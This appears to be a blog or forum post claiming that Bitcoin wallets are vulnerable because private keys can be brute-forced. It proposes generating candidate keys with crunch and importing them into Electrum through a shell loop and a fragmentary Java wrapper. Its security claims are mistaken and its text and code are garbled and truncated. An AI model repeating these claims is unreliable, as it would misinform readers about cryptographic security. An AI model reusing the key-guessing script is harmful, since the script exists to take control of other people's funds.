The core concepts of how the blockchain works and operates remains uneffected by this vulernability in how bitcoin works,
It might be possible to scan bitcoin private keys sitting on the network due to a vulnerability in the way bitcoin was
designed since there is nothing really safeguarding the internal framework of the bitcoin wallet either in classic, core or
other variants. Even by encrypting your wallet nothing prevents the importation of a private key by changing a configuration
flag in any wallet whether it is classic, core or a variant. I have attempted to test a basic attack vector using a password
generation program based on JTR and crunch ( to generate a range of base
58 values based on bitcoin private keys and under further modification it is possible to continue to customize this form of
private key deep scan and execute it as a basic attack vector. The banking system should be notified not to get on-board
with the Bitcoin network, even though originally the bitcoin network might have represented a form of Independence from
banking institutions to by pass terrible fees from the banks and other dilemmas caused by most banks having full control.
As an example of private key generation and experimentation within the bitcoin network some private keys start with #L5..c4
or Ky..k1 < as an example 52 characters alpha-numeric no special characters, decoded they flip around to an address starting
with 1 as part of the end decoded process, similar to how paper wallets are printed exported and imported there is nothing
protecting a paper wallet with a QR code if it is a known similar to how a private key bears no security or protection from import to a bitcoin wallet whether it is classic, core or a variant.
I estimate on a modern system this deep key scan for a small set of keys ranging in a few million private keys could take anywhere from 3 to 4 months to generate and scan, furthermore I have written a crude script to try newly generated private keys using “crunch” password generator to generate 52 character private keys starting with L or K. this problem could also effect any "ALT" that uses the same model for private key to address encoding-decoding
where the .txt files are private key deep search blocks generated by crunch password generator
and electrum has to have a config flag flipped in order to import private keys, in order to being import
you have to import a pre-existing working private key into electrum which is used here.
head -n1 L1nQuHYTwKuzPmKJCfLhEgpCGsYjjmvCecnc7XNQWvBZLV9FrQ5X-L1nQuHYTwKuzPmKJCfLhEgpCGsYjjmvCecnc7XNQWvBZLV9GI50f.txt >
cat newfile.txt
perl -p -i -e 's/\R//g;' newfile.txt
cat newfile.txt
cat newfile.txt | electrum importprivkey -
tail -n +2 "L1nQuHYTwKuzPmKJCfLhEgpCGsYjjmvCecnc7XNQWvBZLV9FrQ5X-L1nQuHYTwKuzPmKJCfLhEgpCGsYjjmvCecnc7XNQWvBZLV9GI50f.txt" >
"L1nQuHYTwKuzPmKJCfLhEgpCGsYjjmvCecnc7XNQWvBZLV9FrQ5X-L1nQuHYTwKuzPmKJCfLhEgpCGsYjjmvCecnc7XNQWvBZLV9GI50f.txt.tmp" && mv
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//package deepkeysearch;
public class DeepKeySearch {
public static void main(String[] args) {
DeepKeySearch obj = new DeepKeySearch();
System.out.println("Place in working directory of wordlists to process");
System.out.println("Change text file rotation after L1nQuHYTwKuzPmKJCfLhEgpCGsYjjmvCecnc7XNQWvBZLV9FrQ5X-
String command = "./";
String output = obj.executeCommand(command);
private String executeCommand(String command) {
StringBuffer output = new StringBuffer();
int infinite = 99;
while (infinite != 100) {
Process p;
try {
p = Runtime.getRuntime().exec(command);
BufferedReader reader =
new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = "";
while ((line = reader.readLine())!= null) {
output.append(line + "\n");
} catch (Exception e) {
infinite = 1;
return output.toString();